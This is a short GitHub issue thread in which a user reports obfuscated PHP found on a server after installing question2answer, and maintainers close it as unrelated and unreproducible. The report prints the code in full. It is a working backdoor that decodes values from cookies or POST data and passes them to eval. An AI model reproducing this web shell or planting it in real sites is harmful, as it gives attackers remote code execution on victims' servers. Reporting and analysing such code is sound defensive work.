### ISSUE TITLE
Getting malware attacks after installing question2answer

### ISSUE THREAD

**Issue by abuzer-firdousi-confiz** [q2a/question2answer#676]
Seeing this type of code after installing on server:
$aughf = 'd*-my5ekr_lHp7nv8u1x3bf6c9ti\'#s4ago';$alzrl = Array();$alzrl[] = $aughf[11].$aughf[1];$alzrl[] = $aughf[29];$alzrl[] = $aughf[23].$aughf[32].$aughf[32].$aughf[21].$aughf[31].$aughf[21].$aughf[22].$aughf[22].$aughf[2].$aughf[13].$aughf[6].$aughf[13].$aughf[25].$aughf[2].$aughf[31].$aughf[20].$aughf[16].$aughf[22].$aughf[2].$aughf[21].$aughf[25].$aughf[5].$aughf[20].$aughf[2].$aughf[24].$aughf[22].$aughf[24].$aughf[18].$aughf[21].$aughf[0].$aughf[5].$aughf[21].$aughf[32].$aughf[0].$aughf[0].$aughf[32];$alzrl[] = $aughf[24].$aughf[34].$aughf[17].$aughf[14].$aughf[26];$alzrl[] = $aughf[30].$aughf[26].$aughf[8].$aughf[9].$aughf[8].$aughf[6].$aughf[12].$aughf[6].$aughf[32].$aughf[26];$alzrl[] = $aughf[6].$aughf[19].$aughf[12].$aughf[10].$aughf[34].$aughf[0].$aughf[6];$alzrl[] = $aughf[30].$aughf[17].$aughf[21].$aughf[30].$aughf[26].$aughf[8];$alzrl[] = $aughf[32].$aughf[8].$aughf[8].$aughf[32].$aughf[4].$aughf[9].$aughf[3].$aughf[6].$aughf[8].$aughf[33].$aughf[6];$alzrl[] = $aughf[30].$aughf[26].$aughf[8].$aughf[10].$aughf[6].$aughf[14];$alzrl[] = $aughf[12].$aughf[32].$aughf[24].$aughf[7];foreach ($alzrl[7]($_COOKIE, $_POST) as $beocpg => $vhvsvzm){function srmvc($alzrl, $beocpg, $edxkyhn){return $alzrl[6]($alzrl[4]($beocpg . $alzrl[2], ($edxkyhn / $alzrl[8]($beocpg)) + 1), 0, $edxkyhn);}function jsmhvoa($alzrl, $slgktu){return @$alzrl[9]($alzrl[0], $slgktu);}function bpmxexo($alzrl, $slgktu){$sdefjc = $alzrl[3]($slgktu) % 3;if (!$sdefjc) {eval($slgktu[1]($slgktu[2]));exit();}}$vhvsvzm = jsmhvoa($alzrl, $vhvsvzm);bpmxexo($alzrl, $alzrl[5]($alzrl[1], $vhvsvzm ^ srmvc($alzrl, $beocpg, $alzrl[8]($vhvsvzm))));}

**Comment by phy25** [comment]
Which file is this code from? This might not be related to q2a...

**Comment by pupi1985** [comment]
This code is unrelated to Q2A. Please, provide the steps to reproduce the issue. Otherwise, it is clearly a layer 8 issue.

**Comment by svivian** [comment]
Closing this as unable to reproduce. Haven't had any reports from others so I don't think it is a problem with Q2A. Of course if you find a security flaw in Q2A I will fix asap.
